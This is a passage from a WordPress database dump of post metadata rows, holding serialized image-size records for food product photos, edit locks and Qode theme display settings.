ght\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"banana_bread6_2048x2048-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1545522362\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9942,4652,'_thumbnail_id','5023'),(9943,4652,'_edit_last','1'),(9945,4652,'qodef_page_content_behind_header_meta','no'),(9946,4652,'qodef_boxed_background_image_attachment_meta','fixed'),(9947,4652,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(9948,4652,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(9949,4652,'qodef_video_type_meta','social_networks'),(9950,4652,'qodef_audio_type_meta','social_networks'),(9951,4652,'qodef_post_skin','qodef-post-light-skin'),(9952,4652,'qodef_disable_vertical_header_background_image_meta','no'),(9953,4652,'qodef_disable_header_widget_logo_area_meta','no'),(9954,4652,'qodef_disable_header_widget_menu_area_meta','no'),(9955,4652,'slide_template','default'),(9956,4652,'rs_page_bg_color','#ffffff'),(9961,4655,'_wp_attached_file','2020/04/Screenshot_1.png'),(9962,4655,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:656;s:6:\"height\";i:654;s:4:\"file\";s:24:\"2020/04/Screenshot_1.png\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"Screenshot_1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"Screenshot_1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:24:\"Screenshot_1-600x598.png\";s:5:\"width\";i:600;s:6:\"height\";i:598;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Screenshot_1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Screenshot_1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:24:\"Screenshot_1-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:24:\"Screenshot_1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:24:\"Screenshot_1-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:24:\"Screenshot_1-656x550.png\";s:5:\"width\";i:656;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:24:\"Screenshot_1-550x654.png\";s:5:\"width\";i:550;s:6:\"height\";i:654;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:24:\"Screenshot_1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"Screenshot_1-600x598.png\";s:5:\"width\";i:600;s:6:\"height\";i:598;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"Screenshot_1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9971,4656,'_edit_lock','1586772297:1'),(9972,4657,'_wp_attached_file','2020/04/2.jpg'),(9973,4657,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:880;s:4:\"file\";s:13:\"2020/04/2.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:13:\"2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:13:\"2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:13:\"2-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"2-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:13:\"2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:13:\"2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:13:\"2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:13:\"2-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:13:\"2-550x880.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:13:\"2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:13:\"2-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:13:\"2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1582568220\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9976,4656,'_thumbnail_id','4657'),(9977,4656,'_edit_last','1'),(9979,4656,'qodef_page_content_behind_header_meta','no'),(9980,4656,'qodef_boxed_background_image_attachment_meta','fixed'),(9981,4656,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(9982,4656,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(9983,4656,'qodef_video_type_meta','social_networks'),(9984,4656,'qodef_audio_type_meta','social_networks'),(9985,4656,'qodef_post_skin','qodef-post-light-skin'),(9986,4656,'qodef_disable_vertical_header_background_image_meta','no'),(9987,4656,'qodef_disable_header_widget_logo_area_meta','no'),(9988,4656,'qodef_disable_header_widget_menu_area_meta','no'),(9989,4656,'slide_template','default'),(9990,4656,'rs_page_bg_color','#ffffff'),(9991,4659,'_edit_lock','1587278045:1'),(9994,4659,'_edit_last','1'),(9996,4659,'qodef_page_content_behind_header_meta','no'),(9997,4659,'qodef_boxed_background_image_attachment_meta','fixed'),(9998,4659,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(9999,4659,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(10000,4659,'qodef_video_type_meta','social_networks'),(10001,4659,'qodef_audio_type_meta','social_networks'),(10002,4659,'qodef_post_skin','qodef-post-light-skin'),(10003,4659,'qodef_disable_vertical_header_background_image_meta','no'),(10004,4659,'qodef_disable_header_widget_logo_area_meta','no'),(10005,4659,'qodef_disable_header_widget_menu_area_meta','no'),(10006,4659,'slide_template','default'),(10007,4659,'rs_page_bg_color','#ffffff'),(10008,4661,'_wp_attached_file','2020/04/fish_thai_web_2048x2048.jpg'),(10009,4661,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1365;s:6:\"height\";i:2048;s:4:\"file\";s:35:\"2020/04/fish_thai_web_2048x2048.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"fish_thai_web_2048x2048-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"fish_thai_web_2048x2048-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"fish_thai_web_2048x2048-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"fish_thai_web_2048x2048-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"fish_thai_web_2048x2048-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"fish_thai_web_2048x2048-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"fish_thai_web_2048x2048-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:35:\"fish_thai_web_2048x2048-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"fish_thai_web_2048x2048-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:37:\"fish_thai_web_2048x2048-1024x1536.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:35:\"fish_thai_web_2048x2048-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:36:\"fish_thai_web_2048x2048-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:36:\"fish_thai_web_2048x2048-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:37:\"fish_thai_web_2048x2048-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"fish_thai_web_2048x2048-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"fish_thai_web_2048x2048-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"fish_thai_web_2048x2048-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1540365787\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10012,4659,'_thumbnail_id','4661'),(10014,4662,'_edit_lock','1586763037:1'),(10017,4662,'_edit_last','1'),(10019,4662,'qodef_page_content_behind_header_meta','no'),(10020,4662,'qodef_boxed_background_image_attachment_meta','fixed'),(10021,4662,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(10022,4662,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(10023,4662,'qodef_video_type_meta','social_networks'),(10024,4662,'qodef_audio_type_meta','social_networks'),(10025,4662,'qodef_post_skin','qodef-post-light-skin'),(10026,4662,'qodef_disable_vertical_header_background_image_meta','no'),(10027,4662,'qodef_disable_header_widget_logo_area_meta','no'),(10028,4662,'qodef_disable_header_widget_menu_area_meta','no'),(10029,4662,'slide_template','default'),(10030,4662,'rs_page_bg_color','#ffffff'),(10031,4664,'_edit_lock','1586732531:1'),(10034,4664,'_edit_last','1'),(10037,4664,'qodef_page_content_behind_header_meta','no'),(10038,4664,'qodef_boxed_background_image_attachment_meta','fixed'),(10039,4664,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(10040,4664,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(10041,4664,'qodef_video_type_meta','social_networks'),(10042,4664,'qodef_audio_type_meta','social_networks'),(10043,4664,'qodef_post_skin','qodef-post-light-skin'),(10044,4664,'qodef_disable_vertical_header_background_image_meta','no'),(10045,4664,'qodef_disable_header_widget_logo_area_meta','no'),(10046,4664,'qodef_disable_header_widget_menu_area_meta','no'),(10047,4664,'slide_template','default'),(10048,4664,'rs_page_bg_color','#ffffff'),(10049,4666,'_edit_lock','1586732557:1'),(10052,4666,'_edit_last','1'),(10054,4666,'qodef_page_content_behind_header_meta','no'),(10055,4666,'qodef_boxed_background_image_attachment_meta','fixed'),(10056,4666,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(10057,4666,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(10058,4666,'qodef_video_type_meta','social_networks'),(10059,4666,'qodef_audio_type_meta','social_networks'),(10060,4666,'qodef_post_skin','qodef-post-light-skin'),(10061,4666,'qodef_disable_vertical_header_background_image_meta','no'),(10062,4666,'qodef_disable_header_widget_logo_area_meta','no'),(10063,4666,'qodef_disable_header_widget_menu_area_meta','no'),(10064,4666,'slide_template','default'),(10065,4666,'rs_page_bg_color','#ffffff'),(10066,4668,'_edit_lock','1586732563:1'),(10069,4668,'_edit_last','1'),(10071,4668,'qodef_page_content_behind_header_meta','no'),(10072,4668,'qodef_boxed_background_image_attachment_meta','fixed'),(10073,4668,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(10074,4668,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(10075,4668,'qodef_video_type_meta','social_networks'),(10076,4668,'qodef_audio_type_meta','social_networks'),(10077,4668,'qodef_post_skin','qodef-post-light-skin'),(10078,4668,'qodef_disable_vertical_header_background_image_meta','no'),(10079,4668,'qodef_disable_header_widget_logo_area_meta','no'),(10080,4668,'qodef_disable_header_widget_menu_area_meta','no'),(10081,4668,'slide_template','default'),(10082,4668,'rs_page_bg_color','#ffffff'),(10083,4670,'_edit_lock','1586732571:1'),(10086,4670,'_edit_last','1'),(10088,4670,'qodef_page_content_behind_header_meta','no'),(10089,4670,'qodef_boxed_background_image_attachment_meta','fixed'),(10090,4670,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(10091,4670,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(10092,4670,'qodef_video_type_meta','social_networks'),(10093,4670,'qodef_audio_type_meta','social_networks'),(10094,4670,'qodef_post_skin','qodef-post-light-skin'),(10095,4670,'qodef_disable_vertical_header_background_image_meta','no'),(10096,4670,'qodef_disable_header_widget_logo_area_meta','no'),(10097,4670,'qodef_disable_header_widget_menu_area_meta','no'),(10098,4670,'slide_template','default'),(10099,4670,'rs_page_bg_color','#ffffff'),(10100,4672,'_edit_lock','1586732586:1'),(10103,4672,'_edit_last','1'),(10105,4672,'qodef_page_content_behind_header_meta','no'),(10106,4672,'qodef_boxed_background_image_attachment_meta','fixed'),(10107,4672,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(10108,4672,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(10109,4672,'qodef_video_type_meta','social_networks'),(10110,4672,'qodef_audio_type_meta','social_networks'),(10111,4672,'qodef_post_skin','qodef-post-light-skin'),(10112,4672,'qodef_disable_vertical_header_background_image_meta','no'),(10113,4672,'qodef_disable_header_widget_logo_area_meta','no'),(10114,4672,'qodef_disable_header_widget_menu_area_meta','no'),(10115,4672,'slide_template','default'),(10116,4672,'rs_page_bg_color','#ffffff'),(10117,4674,'_edit_lock','1586968996:1'),(10120,4674,'_edit_last','1'),(10122,4674,'qodef_page_content_behind_header_meta','no'),(10123,4674,'qodef_boxed_background_image_attachment_meta','fixed'),(10124,4674,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(10125,4674,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(10126,4674,'qodef_video_type_meta','social_networks'),(10127,4674,'qodef_audio_type_meta','social_networks'),(10128,4674,'qodef_post_skin','qodef-post-light-skin'),(10129,4674,'qodef_disable_vertical_header_background_image_meta','no'),(10130,4674,'qodef_disable_header_widget_logo_area_meta','no'),(10131,4674,'qodef_disable_header_widget_menu_area_meta','no'),(10132,4674,'slide_template','default'),(10133,4674,'rs_page_bg_color','#ffffff'),(10134,4676,'_edit_lock','1586732628:1'),(10137,4676,'_edit_last','1'),(10139,4676,'qodef_page_content_behind_header_meta','no'),(10140,4676,'qodef_boxed_background_image_attachment_meta','fixed'),(10141,4676,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(10142,4676,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(10143,4676,'qodef_video_type_meta','social_networks'),(10144,4676,'qodef_audio_type_meta','social_networks'),(10145,4676,'qodef_post_skin','qodef-post-light-skin'),(10146,4676,'qodef_disable_vertical_header_background_image_meta','no'),(10147,4676,'qodef_disable_header_widget_logo_area_meta','no'),(10148,4676,'qodef_disable_header_widget_menu_area_meta','no'),(10149,4676,'slide_template','default'),(10150,4676,'rs_page_bg_color','#ffffff'),(10154,4678,'_edit_lock','1586732616:1'),(10157,4678,'_edit_last','1'),(10159,4678,'qodef_page_content_behind_header_meta','no'),(10160,4678,'qodef_boxed_background_image_attachment_meta','fixed'),(10161,4678,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(10162,4678,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(10163,4678,'qodef_video_type_meta','social_networks'),(10164,4678,'qodef_audio_type_meta','social_networks'),(10165,4678,'qodef_post_skin','qodef-post-light-skin'),(10166,4678,'qodef_disable_vertical_header_background_image_meta','no'),(10167,4678,'qodef_disable_header_widget_logo_area_meta','no'),(10168,4678,'qodef_disable_header_widget_menu_area_meta','no'),(10169,4678,'slide_template','default'),(10170,4678,'rs_page_bg_color','#ffffff'),(10171,4680,'_edit_lock','1586138097:1'),(10174,4680,'_edit_last','1'),(10177,4680,'qodef_page_content_behind_header_meta','no'),(10178,4680,'qodef_boxed_background_image_attachment_meta','fixed'),(10179,4680,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(10180,4680,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(10181,4680,'qodef_video_type_meta','social_networks'),(10182,4680,'qodef_audio_type_meta','social_networks'),(10183,4680,'qodef_post_skin','qodef-post-light-skin'),(10184,4680,'qodef_disable_vertical_header_background_image_meta','no'),(10185,4680,'qodef_disable_header_widget_logo_area_meta','no'),(10186,4680,'qodef_disable_header_widget_menu_area_meta','no'),(10187,4680,'slide_template','default'),(10188,4680,'rs_page_bg_color','#ffffff'),(10193,4682,'_edit_lock','1586138129:1'),(10194,4655,'portfolio_single_masonry_image_size','large-width'),(10195,4655,'image_gallery_masonry_image_size','qodef-large-masonry-item'),(10198,4682,'_edit_last','1'),(10201,4682,'qodef_page_content_behind_header_meta','no'),(10202,4682,'qodef_boxed_background_image_attachment_meta','fixed'),(10203,4682,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(10204,4682,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(10205,4682,'qodef_video_type_meta','social_networks'),(10206,4682,'qodef_audio_type_meta','social_networks'),(10207,4682,'qodef_post_skin','qodef-post-light-skin'),(10208,4682,'qodef_disable_vertical_header_background_image_meta','no'),(10209,4682,'qodef_disable_header_widget_logo_area_meta','no'),(10210,4682,'qodef_disable_header_widget_menu_area_meta','no'),(10211,4682,'slide_template','default'),(10212,4682,'rs_page_bg_color','#ffffff'),(10217,4685,'_edit_lock','1586138174:1'),(10220,4685,'_edit_last','1'),(10222,4685,'qodef_page_content_behind_header_meta','no'),(10223,4685,'qodef_boxed_background_image_attachment_meta','fixed'),(10224,4685,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(10225,4685,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(10226,4685,'qodef_video_type_meta','social_networks'),(10227,4685,'qodef_audio_type_meta','social_networks'),(10228,4685,'qodef_post_skin','qodef-post-light-skin'),(10229,4685,'qodef_disable_vertical_header_background_image_meta','no'),(10230,4685,'qodef_disable_header_widget_logo_area_meta','no'),(10231,4685,'qodef_disable_header_widget_menu_area_meta','no'),(10232,4685,'slide_template','default'),(10233,4685,'rs_page_bg_color','#ffffff'),(10234,4687,'_edit_lock','1586045426:1'),(10237,4687,'_edit_last','1'),(10239,4687,'qodef_page_content_behind_header_meta','no'),(10240,4687,'qodef_boxed_background_image_attachment_meta','fixed'),(10241,4687,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(10242,4687,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(10243,4687,'qodef_video_type_meta','social_networks'),(10244,4687,'qodef_audio_type_meta','social_networks'),(10245,4687,'qodef_post_skin','qodef-post-light-skin'),(10246,4687,'qodef_disable_vertical_header_background_image_meta','no'),(10247,4687,'qodef_disable_header_widget_logo_area_meta','no'),(10248,4687,'qodef_disable_header_widget_menu_area_meta','no'),(10249,4687,'slide_template','default'),(10250,4687,'rs_page_bg_color','#ffffff'),(10251,4689,'_edit_lock','1586212460:1'),(10252,4690,'_edit_lock','1586212401:1'),(10253,4691,'_edit_lock','1586212356:1'),(10256,4691,'_edit_last','1'),(10258,4691,'qodef_page_content_behind_header_meta','no'),(10259,4691,'qodef_boxed_background_image_attachment_meta','fixed'),(10260,4691,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(10261,4691,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(10262,4691,'qodef_video_type_meta','social_networks'),(10263,4691,'qodef_audio_type_meta','social_networks'),(10264,4691,'qodef_post_skin','qodef-post-light-skin'),(10265,4691,'qodef_disable_vertical_header_background_image_meta','no'),(10266,4691,'qodef_disable_header_widget_logo_area_meta','no'),(10267,4691,'qodef_disable_header_widget_menu_area_meta','no'),(10268,4691,'slide_template','default'),(10269,4691,'rs_page_bg_color','#ffffff'),(10272,4689,'_edit_last','1'),(10273,4689,'qodef_page_content_behind_header_meta','no'),(10274,4689,'qodef_boxed_background_image_attachment_meta','fixed'),(10275,4689,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(10276,4689,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(10277,4689,'qodef_video_type_meta','social_networks'),(10278,4689,'qodef_audio_type_meta','social_networks'),(10279,4689,'qodef_post_skin','qodef-post-light-skin'),(10280,4689,'qodef_disable_vertical_header_background_image_meta','no'),(10281,4689,'qodef_disable_header_widget_logo_area_meta','no'),(10282,4689,'qodef_disable_header_widget_menu_area_meta','no'),(10283,4689,'slide_template','default'),(10284,4689,'rs_page_bg_color','#ffffff'),(10285,4694,'_edit_lock','1586212417:1'),(10288,4694,'_edit_last','1'),(10290,4694,'qodef_page_content_behind_header_meta','no'),(10291,4694,'qodef_boxed_background_image_attachment_meta','fixed'),(10292,4694,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(10293,4694,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(10294,4694,'qodef_video_type_meta','social_networks'),(10295,4694,'qodef_audio_type_meta','social_networks'),(10296,4694,'qodef_post_skin','qodef-post-light-skin'),(10297,4694,'qodef_disable_vertical_header_background_image_meta','no'),(10298,4694,'qodef_disable_header_widget_logo_area_meta','no'),(10299,4694,'qodef_disable_header_widget_menu_area_meta','no'),(10300,4694,'slide_template','default'),(10301,4694,'rs_page_bg_color','#ffffff'),(10304,4690,'_edit_last','1'),(10305,4690,'qodef_page_content_behind_header_meta','no'),(10306,4690,'qodef_boxed_background_image_attachment_meta','fixed'),(10307,4690,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(10308,4690,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(10309,4690,'qodef_video_type_meta','social_networks'),(10310,4690,'qodef_audio_type_meta','social_networks'),(10311,4690,'qodef_post_skin','qodef-post-light-skin'),(10312,4690,'qodef_disable_vertical_header_background_image_meta','no'),(10313,4690,'qodef_disable_header_widget_logo_area_meta','no'),(10314,4690,'qodef_disable_header_widget_menu_area_meta','no'),(10315,4690,'slide_template','default'),(10316,4690,'rs_page_bg_color','#ffffff'),(10317,4697,'_edit_lock','1586732635:1'),(10318,4698,'_edit_lock','1586742470:1'),(10321,4698,'_edit_last','1'),(10322,4698,'qodef_page_content_behind_header_meta','no'),(10323,4698,'qodef_boxed_background_image_attachment_meta','fixed'),(10324,4698,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(10325,4698,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(10326,4698,'qodef_video_type_meta','social_networks'),(10327,4698,'qodef_audio_type_meta','social_networks'),(10328,4698,'qodef_post_skin','qodef-post-light-skin'),(10329,4698,'qodef_disable_vertical_header_background_image_meta','no'),(10330,4698,'qodef_disable_header_widget_logo_area_meta','no'),(10331,4698,'qodef_disable_header_widget_menu_area_meta','no'),(10332,4698,'slide_template','default'),(10333,4698,'rs_page_bg_color','#ffffff'),(10336,4697,'_edit_last','1'),(10338,4697,'qodef_page_content_behind_header_meta','no'),(10339,4697,'qodef_boxed_background_image_attachment_meta','fixed'),(10340,4697,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(10341,4697,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(10342,4697,'qodef_video_type_meta','social_networks'),(10343,4697,'qodef_audio_type_meta','social_networks'),(10344,4697,'qodef_post_skin','qodef-post-light-skin'),(10345,4697,'qodef_disable_vertical_header_background_image_meta','no'),(10346,4697,'qodef_disable_header_widget_logo_area_meta','no'),(10347,4697,'qodef_disable_header_widget_menu_area_meta','no'),(10348,4697,'slide_template','default'),(10349,4697,'rs_page_bg_color','#ffffff'),(10350,4701,'_edit_lock','1586732643:1'),(10353,4701,'_edit_last','1'),(10355,4701,'qodef_page_content_behind_header_meta','no'),(10356,4701,'qodef_boxed_background_image_attach